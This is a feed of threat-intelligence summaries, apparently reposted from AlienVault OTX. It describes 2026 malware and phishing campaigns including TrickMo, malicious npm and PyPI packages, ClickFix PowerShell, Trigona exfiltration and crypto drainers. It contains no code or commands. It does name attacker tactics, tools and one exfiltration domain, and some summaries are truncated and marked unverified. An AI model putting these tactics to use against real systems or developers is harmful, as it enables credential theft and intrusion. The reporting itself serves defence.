New TrickMo Variant: Device Take Over malware targeting Banking, Fintech, Wallet & Auth apps

A new variant of the TrickMo Android banking trojan was identified between January and February 2026, representing a substantial platform redesign rather than new capabilities. The malware has migrated its command-and-control infrastructure entirely onto The Open Network (TON) using .adnl endpoints, moving away from conventional internet infrastructure. Active campaigns have targeted banking and wallet users in France, Italy, and Austria. Once accessibility permissions are granted, operators gain real-time device control including credential phishing, keylogging, screen recording, SMS interception, and bidirectional remote control. New features include network reconnaissance capabilities and SSH tunnelling that transform infected devices into programmable network pivots and SOCKS5 proxy exit nodes, enabling operators to bypass IP-based fraud detection systems while accessing victim networks.

Pulse ID: 6a019c5f0a3344d92c4302a3
Pulse Link: https://otx.alienvault.com/pulse/6a019c5f0a3344d92c4302a3
Pulse Author: AlienVault
Created: 2026-05-11 09:07:43

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Android #Bank #BankingTrojan #CyberSecurity #Endpoint #France #InfoSec #Italy #Malware #OTX #OpenThreatExchange #Phishing #Proxy #RAT #RCE #SMS #SSH #Trojan #bot #socks5 #AlienVault

Abuse of Cloud-Native Infrastructure in Modern Phishing Campaigns

An investigation has revealed a structural evolution in phishing operations where threat actors conduct entire campaigns through legitimate, enterprise-trusted cloud infrastructure rather than attacker-controlled systems. Adversaries weaponize platforms employees use daily, including cloud storage, productivity suites, and OAuth authentication endpoints. Attacks originate from legitimate Google or Microsoft systems, passing all authentication checks while linking to whitelisted cloud services. Multi-factor authentication is bypassed without touching passwords, and victim organizations show no anomalous SIEM events at compromise time. Campaigns employ five stages: delivery via provider-owned infrastructure, payload hosting on legitimate cloud storage, execution within browser memory using native APIs, credential theft through legitimate authentication flows, and persistent presence through licensed services. Detection requires behavioral analysis rather than traditional indicators, as attackers operate enti...

Pulse ID: 69fe0ae9bf660196169e557b
Pulse Link: https://otx.alienvault.com/pulse/69fe0ae9bf660196169e557b
Pulse Author: AlienVault
Created: 2026-05-08 16:10:17

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Browser #Cloud #CyberSecurity #Endpoint #Google #InfoSec #Microsoft #OTX #OpenThreatExchange #Password #Passwords #Phishing #RAT #Rust #Troll #Word #bot #AlienVault

CVE Alert: CVE-2026-6973 - Ivanti - Endpoint Manager Mobile - https://www.redpacketsecurity.com/cve-alert-cve-2026-6973-ivanti-endpoint-manager-mobile/

#OSINT #ThreatIntel #CyberSecurity #cve-2026-6973 #ivanti #endpoint-manager-mobile

Four published versions of a fake "tanstack" package uploaded in 27 minutes that want to steal your .env files

An attacker registered the unscoped 'tanstack' name on npm and published four malicious versions (2.0.4-2.0.7) within 27 minutes on April 29, 2026. These packages contained postinstall hooks that automatically exfiltrated environment files containing sensitive credentials when developers ran npm install. The attacker exploited name confusion with the legitimate @tanstack organization, which publishes widely-used JavaScript libraries. The malicious code targeted .env files, stealing AWS keys, API tokens, database credentials, and OAuth secrets by sending them to an attacker-controlled Svix webhook endpoint. Version 2.0.6 was particularly dangerous, sweeping all .env variants in the working directory. The version history reveals live debugging by the attacker, who iteratively refined the payload targeting and stealth capabilities while the package remained publicly available with approximately 19,830 monthly downloads.

Pulse ID: 69f9fed3a3c5ca9c78a875a9
Pulse Link: https://otx.alienvault.com/pulse/69f9fed3a3c5ca9c78a875a9
Pulse Author: AlienVault
Created: 2026-05-05 14:29:39

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#AWS #CyberSecurity #Endpoint #InfoSec #Java #JavaScript #NPM #OTX #OpenThreatExchange #RAT #Troll #bot #developers #AlienVault

Gleaming Pisces Poisoned Python Packages Campaign Delivers PondRAT Linux and macOS Backdoors

An ongoing campaign has been discovered delivering Linux and macOS backdoors through poisoned Python packages uploaded to PyPI repository. The activity is attributed with medium confidence to Gleaming Pisces, a North Korean financially motivated threat actor affiliated with the Reconnaissance General Bureau. The campaign delivered PondRAT, identified as a lighter version of the known POOLRAT remote administration tool. Multiple malicious packages including real-ids, coloredtxt, beautifultext, and minisound were used to establish an evasive infection chain. The threat actor aims to compromise supply chain vendors through developer endpoints to ultimately access their customers' systems. Code analysis reveals significant similarities between PondRAT and previously attributed Gleaming Pisces malware, including identical function names, encryption keys, and execution flows. Both Linux and macOS variants were identified, demonstrating the group's expanding cross-platform capabilities targeting the cryptocurrenc...

Pulse ID: 69f837f3d2d59a26f6d3acf3
Pulse Link: https://otx.alienvault.com/pulse/69f837f3d2d59a26f6d3acf3
Pulse Author: AlienVault
Created: 2026-05-04 06:08:51

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#BackDoor #CyberSecurity #DRat #Encryption #Endpoint #InfoSec #Korea #Linux #Mac #MacOS #Malware #NorthKorea #OTX #OpenThreatExchange #PyPI #Python #RAT #SupplyChain #bot #AlienVault

User interaction with a ClickFix-style phishing site resulted in execution of an obfuscated PowerShell command

A ClickFix-style phishing campaign leveraged social engineering to trick users into executing obfuscated PowerShell commands that downloaded and installed a malicious MSI payload from a remote server. The attack employed a sophisticated multi-stage infection chain utilizing DLL sideloading techniques with renamed legitimate binaries to execute malicious components. The final payload deployed HijackLoader to deliver a Lumma-style information stealer designed for credential harvesting and data exfiltration. The campaign utilized multiple command-and-control domains and infrastructure hosted on specific IP addresses. Mitigation measures include blocking identified artifacts, enhancing user awareness about ClickFix social engineering tactics, implementing endpoint detection for suspicious PowerShell activity and unsigned DLL sideloading, and isolating compromised systems for remediation.

Pulse ID: 69f1de85544538ce8b03332a
Pulse Link: https://otx.alienvault.com/pulse/69f1de85544538ce8b03332a
Pulse Author: AlienVault
Created: 2026-04-29 10:33:41

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CredentialHarvesting #CyberSecurity #Endpoint #HijackLoader #ICS #InfoSec #OTX #OpenThreatExchange #Phishing #PowerShell #RAT #SideLoading #SocialEngineering #bot #AlienVault

Multi-Stage Malware Execution Chain Analysis

A sophisticated multi-stage malware execution chain was discovered during proactive threat hunting activities using endpoint telemetry and dynamic analysis. The attack sequence demonstrates advanced techniques including script masquerading, defense evasion mechanisms, staged payload extraction, and establishment of command-and-control communications. The malware exhibits capabilities for downloading additional payloads, presenting risks of data exfiltration and lateral movement within compromised networks. Immediate network isolation of affected systems is critical, with full system reimaging strongly recommended to ensure complete removal of all malicious components. The investigation identified multiple malicious file hashes, a command-and-control IP address, and an associated domain used for maintaining persistent access to compromised environments.

Pulse ID: 69f1e236e4e192f639298d53
Pulse Link: https://otx.alienvault.com/pulse/69f1e236e4e192f639298d53
Pulse Author: AlienVault
Created: 2026-04-29 10:49:26

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #Endpoint #InfoSec #Malware #OTX #OpenThreatExchange #RAT #SMS #bot #AlienVault

Trigona Affiliates Deploy Custom Exfiltration Tool to Streamline Data Theft

Trigona ransomware affiliates have adopted a custom-developed exfiltration tool called uploader_client.exe in attacks observed during March 2026, marking a significant tactical evolution. This command-line utility features parallel data streams, connection rotation to evade network monitoring, and granular file filtering capabilities. The shift from commonly used off-the-shelf tools like Rclone to proprietary malware suggests attackers are attempting to maintain a lower profile during critical attack phases. Prior to data exfiltration, attackers deploy multiple security-disabling tools including HRSword, PCHunter, and various BYOVD utilities to terminate endpoint protection at the kernel level. Remote access is established through AnyDesk, while credential theft is conducted using Mimikatz and Nirsoft utilities. This custom tooling approach demonstrates a higher degree of technical maturity compared to typical ransomware affiliate operations.

Pulse ID: 69ea2ebf9d87464f7c54c08e
Pulse Link: https://otx.alienvault.com/pulse/69ea2ebf9d87464f7c54c08e
Pulse Author: AlienVault
Created: 2026-04-23 14:37:51

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#AnyDesk #CyberSecurity #DataTheft #ELF #Endpoint #InfoSec #Malware #OTX #OpenThreatExchange #RAT #RansomWare #Rclone #Trigona #Word #bot #AlienVault

Crypto Drainers as a Converging Threat: Insights into Emerging Hybrid Attack Ecosystems

Cybercriminals are merging traditional malware operations with cryptocurrency-focused attacks, creating hybrid threat ecosystems. Modern crypto drainers have evolved into automated systems capable of extracting assets across multiple blockchains with minimal user interaction, supported by well-developed underground marketplaces offering drainer-as-a-service kits. Two case studies exemplify this convergence: StepDrainer operates as a multichain drainer-as-a-service platform that abuses Web3Modal and smart contract methods across over 20 blockchain networks, using AI-themed lures and polished interfaces to deceive victims into connecting wallets. EtherRAT represents a hybrid Windows implant delivered through trojanized TFTP installers, combining traditional RAT capabilities with blockchain-aware functionality including Ethereum RPC endpoints and embedded wallet addresses. Both threats demonstrate how cryptocurrency theft infrastructure now intersects with mainstream attack surfaces affecting enterprise envir...

Pulse ID: 69ea724596582ed94bc23acf
Pulse Link: https://otx.alienvault.com/pulse/69ea724596582ed94bc23acf
Pulse Author: AlienVault
Created: 2026-04-23 19:25:57

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#BlockChain #CyberSecurity #Endpoint #InfoSec #Malware #Nim #OTX #OpenThreatExchange #RAT #RPC #Trojan #Web3 #Windows #bot #cryptocurrency #AlienVault

npm Packages Hit with TeamPCP-Style CanisterWorm Malware

Malicious npm packages associated with Namastex.ai were compromised with malware exhibiting tradecraft similar to TeamPCP's CanisterWorm campaign. The attack targeted packages including @automagik/genie and pgserve, implementing install-time execution that harvests credentials, environment variables, SSH keys, cloud credentials, browser data, and crypto-wallet artifacts. The payload exfiltrates stolen data to both a conventional webhook at telemetry.api-monitor.com and an Internet Computer Protocol canister endpoint. It incorporates self-propagation logic to compromise additional npm packages using stolen publishing tokens and includes cross-ecosystem spreading capabilities targeting PyPI. The malware uses hybrid encryption with RSA and AES-256-CBC for data exfiltration. Multiple package namespaces were affected, suggesting shared infrastructure or coordinated compromise across publisher accounts.

Pulse ID: 69e8f5ba273a5389cb4d03f5
Pulse Link: https://otx.alienvault.com/pulse/69e8f5ba273a5389cb4d03f5
Pulse Author: AlienVault
Created: 2026-04-22 16:22:18

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Browser #Cloud #CyberSecurity #ELF #Encryption #Endpoint #InfoSec #Malware #NPM #OTX #OpenThreatExchange #PyPI #RAT #SSH #Worm #bot #AlienVault